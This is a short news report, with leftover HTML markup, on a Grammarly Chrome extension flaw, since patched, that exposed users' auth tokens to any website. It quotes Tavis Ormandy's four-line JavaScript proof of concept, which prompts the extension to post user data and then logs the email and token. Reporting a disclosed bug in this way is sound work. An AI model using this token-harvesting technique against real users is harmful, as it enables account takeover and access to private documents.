Grammarly has released a patch to fix a vulnerability that would have allowed websites to view your personal data and documents.<\/p>\n
A researcher at Google’s Project Zero, Tavis Ormandy, labeled the bug as high severity on account of the extension exposing authentication tokens to all websites.<\/span><\/p>\n The Grammarly Chrome extension (approx ~22M users) exposes it’s auth tokens to all websites, therefore any website can login to grammarly.com<\/a> as you and access all your documents, history, logs, and all other data. I’m calling this a high severity bug, because it seems like a pretty severe violation of user expectations.<\/p>\n<\/blockquote>\n Ormandy provided a proof of concept the showed how the bug could be exploited with four lines of code.<\/p>\n > document.body.contentEditable=true \/\/ Trigger grammarly<\/p>\n > document.querySelector(“[data-action=editor]”).click() \/\/ Click the editor button<\/p>\n > document.querySelector(“iframe.gr_-ifr”).contentWindow.addEventListener(“message”, function (a) {console.log(a.data.user.email, a.data.user.grauth); }) \/\/ log auth token and email<\/p>\n > window.postMessage({grammarly: 1, action: “user” }, “*”) \/\/ Request user data<\/p>\n<\/blockquote>\n That produces a token that can then be used by anyone to log in to Grammarly as you.<\/p>\n\n
\n